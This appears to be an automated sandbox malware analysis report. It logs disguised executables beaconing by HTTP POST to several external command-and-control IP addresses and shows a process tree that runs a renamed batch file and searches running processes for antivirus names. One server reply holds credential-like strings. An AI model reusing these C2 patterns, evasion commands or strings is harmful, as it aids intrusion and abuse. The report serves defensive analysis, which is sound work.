                                                        X-Api-Key: 6XasKCGZ
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:41.832618952 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:41 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.84971146.8.236.61807096C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:41.852396965 CEST297OUTPOST / HTTP/1.1
                                                        Host: 46.8.236.61
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: hL9AeKPa
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:42.532377005 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:42 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.84971793.185.159.253807096C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:42.565439939 CEST300OUTPOST / HTTP/1.1
                                                        Host: 93.185.159.253
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: h2LP2r9u
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:43.248764038 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:43 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.84971891.212.166.91807096C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:43.534600019 CEST299OUTPOST / HTTP/1.1
                                                        Host: 91.212.166.91
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: 4JUSGwnq
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:44.234153032 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:44 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.84981246.8.232.106803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:55.235788107 CEST298OUTPOST / HTTP/1.1
                                                        Host: 46.8.232.106
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: VkfvHUBo
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:55.908557892 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:55 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.84981846.8.236.61803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:55.918968916 CEST297OUTPOST / HTTP/1.1
                                                        Host: 46.8.236.61
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: QUHVJpJW
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:56.597656012 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:56 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.84982493.185.159.253803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:56.668065071 CEST300OUTPOST / HTTP/1.1
                                                        Host: 93.185.159.253
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: 5ZG3hPH8
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:57.533864021 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:57 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests
                                                        Oct 15, 2024 09:39:57.567087889 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:57 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.84983091.212.166.91803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:39:57.541879892 CEST299OUTPOST / HTTP/1.1
                                                        Host: 91.212.166.91
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: 0o16jsf1
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:39:58.239454985 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:39:58 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.84995246.8.232.106807096C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:40:14.343102932 CEST298OUTPOST / HTTP/1.1
                                                        Host: 46.8.232.106
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: CZMzRol0
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:40:15.378089905 CEST554INHTTP/1.1 200 OK
                                                        Date: Tue, 15 Oct 2024 07:40:15 GMT
                                                        Content-Length: 436
                                                        Content-Type: text/plain; charset=utf-8
                                                        Data Raw: 39 34 2e 31 30 33 2e 38 35 2e 31 31 34 3b 33 30 32 30 32 3b 68 6d 69 63 74 6b 75 39 74 4f 6f 69 70 43 42 32 3a 4f 41 55 2f 75 6c 6e 2f 4d 64 49 34 79 56 4c 36 57 48 7a 2e 36 68 69 38 65 4b 6a 2e 4f 66 62 32 56 77 42 33 6c 65 75 32 46 55 72 2e 4a 72 4c 31 4a 67 42 30 56 6b 65 36 44 62 55 2c 77 33 64 68 73 4c 47 74 4b 50 61 74 6b 76 4b 70 6b 4c 46 3a 7a 77 6d 2f 4a 59 6b 2f 78 77 6f 34 52 31 39 36 54 6b 70 2e 50 79 4d 38 55 65 4e 2e 53 58 50 32 62 6a 58 33 58 49 4e 36 43 59 38 2e 61 73 6a 36 6f 62 64 31 38 71 72 2c 36 4f 61 68 37 47 32 74 32 70 32 74 42 4b 43 70 50 6b 6c 3a 42 4f 43 2f 32 34 4a 2f 53 38 4c 39 59 75 41 33 35 54 4a 2e 44 53 39 31 49 34 31 38 44 6e 78 35 65 76 44 2e 54 37 33 31 58 34 73 35 75 35 4d 39 34 56 4b 2e 37 6b 4d 32 49 58 69 35 6c 76 70 33 45 49 4c 2c 37 6a 49 68 6d 63 6d 74 35 72 30 74 6b 79 71 70 4f 50 34 3a 30 37 35 2f 6c 53 55 2f 39 4b 35 39 35 61 76 31 66 77 4d 2e 4b 44 66 32 4f 76 30 31 67 7a 32 32 78 30 52 2e 41 77 51 31 57 38 46 36 47 6b 77 36 59 32 30 2e 36 47 59 39 77 [TRUNCATED]
                                                        Data Ascii: 94.103.85.114;30202;hmictku9tOoipCB2:OAU/uln/MdI4yVL6WHz.6hi8eKj.Ofb2VwB3leu2FUr.JrL1JgB0Vke6DbU,w3dhsLGtKPatkvKpkLF:zwm/JYk/xwo4R196Tkp.PyM8UeN.SXP2bjX3XIN6CY8.asj6obd18qr,6Oah7G2t2p2tBKCpPkl:BOC/24J/S8L9YuA35TJ.DS91I418Dnx5evD.T731X4s5u5M94VK.7kM2IXi5lvp3EIL,7jIhmcmt5r0tkyqpOP4:075/lSU/9K595av1fwM.KDf2Ov01gz22x0R.AwQ1W8F6Gkw6Y20.6GY9wip1xYR,CbkhmnPtKj6t8QdpiLF:A3q/Ai7/xpb1Mlb82yq8Wo9.S571jzS39WB0ozS.FrW2AL90W6P6ZXY.4Ac2LjV4eKg3URB


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.84998746.8.232.106803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:40:28.246815920 CEST298OUTPOST / HTTP/1.1
                                                        Host: 46.8.232.106
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: lVR0XCbC
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:40:29.017896891 CEST165INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:40:28 GMT
                                                        Content-Length: 1
                                                        Data Raw: 0a
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.84998846.8.236.61803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:40:29.998989105 CEST297OUTPOST / HTTP/1.1
                                                        Host: 46.8.236.61
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: fshMD7DM
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:40:30.613538980 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:40:30 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.84998993.185.159.253803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:40:30.622271061 CEST300OUTPOST / HTTP/1.1
                                                        Host: 93.185.159.253
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: SOaJTUHl
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:40:31.304588079 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:40:31 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.84999091.212.166.91803900C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr
                                                        TimestampBytes transferredDirectionData
                                                        Oct 15, 2024 09:40:31.316394091 CEST299OUTPOST / HTTP/1.1
                                                        Host: 91.212.166.91
                                                        User-Agent: Go-http-client/1.1
                                                        Content-Length: 162
                                                        X-Api-Key: w56nGq4j
                                                        Accept-Encoding: gzip
                                                        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                        Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                        Oct 15, 2024 09:40:32.013349056 CEST183INHTTP/1.1 429 Too Many Requests
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 15 Oct 2024 07:40:31 GMT
                                                        Content-Length: 18
                                                        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                        Data Ascii: Too many requests


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:38:24
                                                        Start date:15/10/2024
                                                        Path:C:\Users\user\Desktop\sV9ElC4fU4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\sV9ElC4fU4.exe"
                                                        Imagebase:0x400000
                                                        File size:7'662'434 bytes
                                                        MD5 hash:BF53F19B542DF72AACF589A049619BC7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:03:38:27
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Min Min.bat & Min.bat
                                                        Imagebase:0xa40000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:38:27
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:03:38:27
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x730000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:38:27
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "wrsa opssvc"
                                                        Imagebase:0x120000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:38:28
                                                        Start date:15/10/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x730000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:38:28
                                                        Start date:15/10/2024
